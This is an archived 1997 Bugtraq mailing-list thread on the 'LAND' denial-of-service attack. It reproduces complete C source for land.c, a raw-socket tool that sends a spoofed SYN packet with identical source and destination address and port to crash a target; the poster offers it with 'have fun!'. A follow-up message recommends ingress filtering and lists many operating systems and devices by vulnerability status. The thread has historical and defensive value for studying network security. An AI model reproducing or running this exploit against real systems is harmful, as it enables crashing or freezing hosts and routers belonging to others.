--- Begin Message ---I tested this on a falcon running mint 1.14 pl3, mintnet 1.0 pl1 and rlogin as the only service available. It seems to lock the machine quite well, but ctrl-alt-del still works. As other systems have behaved in strange ways, I'll need to test some more. ---clip---clip--- MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Message-ID: <Pine.LNX.3.96.971120193920.5942A-100000@lagged.net> Date: Thu, 20 Nov 1997 19:40:19 -0500 Reply-To: m3lt <meltman@LAGGED.NET> From: m3lt <meltman@LAGGED.NET> Subject: new TCP/IP bug in win95 To: BUGTRAQ@NETSPACE.ORG hi, i recently discovered a bug which freezes win95 boxes. here's how it works: send a spoofed packet with the SYN flag set from a host, on an open port (such as 113 or 139), setting as source the SAME host and port (ie: 10.0.0.1:139 to 10.0.0.1:139). this will cause the win95 machine to lock up. the piece of code included in this message does that, so... have fun! i haven't tested this bug on other platforms, i don't have the ressources. please feel free to do so. m3lt meltman@lagged.net --- snip snip ----------------------------------------------------------- /* land.c by m3lt, FLC crashes a win95 box */ #include <stdio.h> #include <netdb.h> #include <arpa/inet.h> #include <netinet/in.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/ip.h> #include <netinet/ip_tcp.h> #include <netinet/protocols.h> struct pseudohdr { struct in_addr saddr; struct in_addr daddr; u_char zero; u_char protocol; u_short length; struct tcphdr tcpheader; }; u_short checksum(u_short * data,u_short length) { register long value; u_short i; for(i=0;i<(length>>1);i++) value+=data[i]; if((length&1)==1) value+=(data[i]<<8); value=(value&65535)+(value>>16); return(~value); } int main(int argc,char * * argv) { struct sockaddr_in sin; struct hostent * hoste; int sock; char buffer[40]; struct iphdr * ipheader=(struct iphdr *) buffer; struct tcphdr * tcpheader=(struct tcphdr *) (buffer+sizeof(struct iphdr)); struct pseudohdr pseudoheader; fprintf(stderr,"land.c by m3lt, FLC\n"); if(argc<3) { fprintf(stderr,"usage: %s IP port\n",argv[0]); return(-1); } bzero(&sin,sizeof(struct sockaddr_in)); sin.sin_family=AF_INET; if((hoste=gethostbyname(argv[1]))!=NULL) bcopy(hoste->h_addr,&sin.sin_addr,hoste->h_length); else if((sin.sin_addr.s_addr=inet_addr(argv[1]))==-1) { fprintf(stderr,"unknown host %s\n",argv[1]); return(-1); } if((sin.sin_port=htons(atoi(argv[2])))==0) { fprintf(stderr,"unknown port %s\n",argv[2]); return(-1); } if((sock=socket(AF_INET,SOCK_RAW,255))==-1) { fprintf(stderr,"couldn't allocate raw socket\n"); return(-1); } bzero(&buffer,sizeof(struct iphdr)+sizeof(struct tcphdr)); ipheader->version=4; ipheader->ihl=sizeof(struct iphdr)/4; ipheader->tot_len=htons(sizeof(struct iphdr)+sizeof(struct tcphdr)); ipheader->id=htons(0xF1C); ipheader->ttl=255; ipheader->protocol=IP_TCP; ipheader->saddr=sin.sin_addr.s_addr; ipheader->daddr=sin.sin_addr.s_addr; tcpheader->th_sport=sin.sin_port; tcpheader->th_dport=sin.sin_port; tcpheader->th_seq=htonl(0xF1C); tcpheader->th_flags=TH_SYN; tcpheader->th_off=sizeof(struct tcphdr)/4; tcpheader->th_win=htons(2048); bzero(&pseudoheader,12+sizeof(struct tcphdr)); pseudoheader.saddr.s_addr=sin.sin_addr.s_addr; pseudoheader.daddr.s_addr=sin.sin_addr.s_addr; pseudoheader.protocol=6; pseudoheader.length=htons(sizeof(struct tcphdr)); bcopy((char *) tcpheader,(char *) &pseudoheader.tcpheader,sizeof(struct tcphdr)); tcpheader->th_sum=checksum((u_short *) &pseudoheader,12+sizeof(struct tcphdr)); if(sendto(sock,buffer,sizeof(struct iphdr)+sizeof(struct tcphdr),0,(struct sockaddr *) &sin,sizeof(struct sockaddr_in))==-1) { fprintf(stderr,"couldn't send packet\n"); return(-1); } fprintf(stderr,"%s:%s landed\n",argv[1],argv[2]); close(sock); return(0); } --- snip snip ----------------------------------------------------------- From: Aleph One <aleph1@dfw.net> Subject: Re: "LAND" Attack Update To: BUGTRAQ@NETSPACE.ORG Date: Fri, 21 Nov 1997 13:22:22 -0600 Reply-To: Aleph One <aleph1@dfw.net> X-From-Line: owner-bugtraq@NETSPACE.ORG Sat Nov 22 00:37:25 1997 Received: from brimstone.netspace.org (brimstone.netspace.org [128.148.157.143]) by gfanrend.fishpool.com (8.8.7/8.6.10) with ESMTP id AAA00603 for <tjhukkan@FISHPOOL.COM>; Sat, 22 Nov 1997 00:37:13 +0200 Received: from unknown@netspace.org (port 4105 [128.148.157.6]) by brimstone.netspace.org with ESMTP id <203-10584>; Fri, 21 Nov 1997 14:41:08 -0500 Received: from NETSPACE.ORG by NETSPACE.ORG (LISTSERV-TCP/IP release 1.8c) with spool id 5789683 for BUGTRAQ@NETSPACE.ORG; Fri, 21 Nov 1997 14:39:24 -0500 Received: from brimstone.netspace.org (brimstone.netspace.org [128.148.157.143]) by netspace.org (8.8.7/8.8.2) with ESMTP id OAA30673 for <BUGTRAQ@NETSPACE.ORG>; Fri, 21 Nov 1997 14:38:46 -0500 Received: from unknown@netspace.org (port 4105 [128.148.157.6]) by brimstone.netspace.org with ESMTP id <96261-10583>; Fri, 21 Nov 1997 14:38:19 -0500 Approved-By: aleph1@UNDERGROUND.ORG Received: from dfw.dfw.net (DFW.DFW.NET [198.175.15.10]) by netspace.org (8.8.7/8.8.2) with SMTP id OAA24104 for <BUGTRAQ@NETSPACE.ORG>; Fri, 21 Nov 1997 14:19:56 -0500 Received: from localhost by dfw.dfw.net (4.1/SMI-4.1) id AA07885; Fri, 21 Nov 97 13:22:22 CST Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Message-ID: <Pine.SUN.3.94.971121131518.2700D-100000@dfw.dfw.net> Sender: Bugtraq List <BUGTRAQ@NETSPACE.ORG> X-cc: mtibodea@cisco.com In-Reply-To: <Pine.SUN.3.94.971121011301.9521D-100000@dfw.dfw.net> Lines: 141 Xref: gfanrend.fishpool.com bugtraq:1182 The latest update. It seems that not many versions of IOS are affected. The symptoms can also be strange. It will stop accepting connection, then after 30 seconds if may stop accepting processing ICMP echos, and after that it stops forwarding packets. So if you perform the test wait a couple of minutes and see if it still up before you come to any conclusions. Ivan Ganev also reports that testing again port 23 alone would not kill the router but testing againts the first 255 ports did. >From the reports is seem to be the older revisions of IOS (10.X and 11.0) in certain hardware configurations and the Cisco 700 Series ISDN access routers (not running IOS) are vulnerable. We keep getting conflicting reports for FreeBSD and OpenBSD. The are enough reports and indications that those operating systems are indeed vulnerable but the vulnerabilitiy may not show up in all configurations depending on the enviroment, the intensity of cosmic rays, the phase of the moon, and if the testing person is left or right handed. An external "land" attack should not be an issue if you are filtering IP address spoofing at your ingress routers. You _ARE_ doing so? Correct? Well in case you forgot you can find Paul Ferguson's "Network Ingress Filtering: Defeating Denial of Service Address Spoofing" Internet Draft at ftp://ietf.org/internet-drafts/draft-ferguson-ingress-filtering-03.txt I highly recommend you implement it's recommendations. Of curse you are still at the mercy of those behind the filter. The survey says: AIX 3 IS vulnerable AIX 3.2 NOT vulnerable AIX 4 NOT vulnerable AIX 4.1 NOT vulnerable BeOS Preview Release 2 PowerMac IS vulnerable BSDI 2.1 (vanilla) IS vulnerable BSDI 2.1 (K210-021,K210-022,K210-024) NOT vulnerable BSDI 3.0 NOT vulnerable DG/UX R4.12 NOT vulnerable Digital UNIX 4.0 NOT vulnerable FreeBSD 2.2.2-RELEASE (confilcting reports) FreeBSD 2.2.5-RELEASE (conflicting reports) FreeBSD 2.2.5-STABLE (conflicting reports) FreeBSD 3.0-CURRENT IS vulnerable HP External JetDirect Print Servers IS vulnerable HP-UX 10.20 IS vulnerable IRIX 5.3 IS vulnerable IRIX 6.2 NOT vulnerable IRIX 6.3 NOT vulnerable IRIX 6.4 NOT vulnerable Linux 2.0.30 NOT vulnerable Linux 2.0.32 NOT vulnerable MacOS 7.5.1 NOT vulnerable MacOS 8.0 IS vulnerable (TCP/IP stack crashed) MVS OS390 1.3 NOT vulnerable AIX 4.1 NOT vulnerable NetApp NFS server 4.3 IS vulnerable NetBSD 1.1 IS vulnerable NetBSD 1.2 IS vulnerable NetBSD 1.2a IS vulnerable NetBSD 1.2.1 IS vulnerable NetBSD 1.3_ALPHA IS vulnerable NeXTSTEP 3.0 IS vulnerable NeXTSTEp 3.1 IS vulnerable Novell 4.11 NOT vulnerable OpenBSD 2.1 (conflicting reports) OS/2 3.0 NOT vulnerable QNX 4.24 IS vulnerable OpenBSD 2.2 (Oct31) NOT vulnerable SCO OpenServer 5.0.4 NOT vulnerable Salaris 2.4 NOT vulnerable Solaris 2.5.1 NOT vulnerable Solaris 2.6 NOT vulnerable SunOS 4.1.4 IS vulnerable Ultrix ??? NOT vulnerable Windows 95 (vanilla) IS vulnerable Windows 95 + Winsock 2 + VIPUPD.EXE IS vulnerable Windows NT (vanilla) IS vulnerable Windows NT + SP3 IS vulnerable Windows NT + SP3 + simptcp-fix IS vulnerable Some misc stuff: 3Com SuperStack II IS vulnerable Apple LaserWriter IS vulnerable Ascend 4000 5.0Ap20 NOT vulnerable Ascend Pipeline 50 rev 5.0Ai16 NOT vulnerable Ascend Pipeline 50 rev 5.0Ap13 NOT vulnerable BayNetworks MARLIN 1000 OS (0).3.024(R) NOT vulnerable BinTec BIANCA/BRICK-XS 4.6.1 router IS vulnerable Cisco IOS 10.3(7) IS vulnerable Cisco IOS 11.1(13) NOT vulnerable Cisco 1003 IOS 11.0 NOT vulnerable Cisco 1005 IOS 11.0(4) NOT vulnerable Cisco 1600 IOS 11.0(6) fc1 IS vulnerable Cisco 1601 IOS 11.1(8) AA NOT vulnerable Cisco 1601 IOS 11.1(10)AA NOT vulnerable Cisco 2500 IOS 11.0(9) NOT vulnerable Cisco 2500 IOS 11.1(6) fc1 IS vulnerable Cisco 2500 IOS 11.1(10) NOT vulnerable Cisco 2501 IOS 10.2 IS vulnerable Cisco 2501 IOS 10.2(2) IS vulnerable Cisco 2501 IOS 10.(7) IS vulnerable Cisco 2501 IOS 11.1(9) NOT vulnerable Cisco 2501 IOS 11.2(4)P NOT vulnerable Cisco 2503 IOS 11.0(9) IS vulnerable Cisco 2509 IOS 11.1 NOT vulnerable Cisco 2511 IOS ??? IS vulnerable Cisco 2511 IOS 10.3(4) NOT vulnerable Cisco 2511 IOS 11.1(8) NOT vulnerable Cisco 2511 IOS 11.2(4) NOT vulnerable Cisco 2514 IOS 11.2(5) NOT vulnerable Cisco 3102 IOS 9.X IS vulnerable Cisco 4000 IOS 11.0(7) NOT vulnerable Cisco 4000 IOS 11.1(6) NOT vulnerable Cisco 4000 IOS 11.2(4) fc1 NOT vulnerable Cisco 4000 IOS 11.2(9) NOT vulnerable Cisco 4500 IOS 10.13(15) IS vulnerable Cisco 4500 IOS 11.2(9) NOT vulnerable Cisco 4700M IOS 11.0(16) NOT vulnerable Cisco 7000 IOS 11.0(1) NOT vulnerable Cisco 7000 IOS 11.0(16) NOT vulnerable Cisco 7000 IOS 11.1(12) NOT vulnerable Cisco 7000 IOS 11.2(8) NOT vulnerable Cisco 7507 IOS 11.0(17) NOT vulnerable Cisco 753 OS Release 4 IS vulnerable Cisco 753 OS Release 4.0 IS vulnerable Cisco 754 OS Release 4.1 IS vulnerable Cisco 761 OS Release 4.0(1) IS vulnerable Cisco Catalyst 5000 IS vulnerable Digital VT1200 IS vulnerable HP Envizex Terminal IS vulnerable LaserJet Printer NOT vulnerable Livingston Office Router (ISDN) IS vulnerable Livingston PM ComOS 3.3.3 NOT vulnerable Livingston PM ComOS 3.5b17 + 3.7.2 NOT vulnerable Livingston PM ComOS 3.7L NOT vulnerable Livingston Enterprise PM 3.4 2L NOT vulnerable Milkyway Firewall 3.02 (SunOS) IS vulnerable NCD X Terminals, NCDWare v3.1.0 IS vulnerable NCD X Terminals, NCDWare v3.2.1 IS vulnerable
--- End Message ---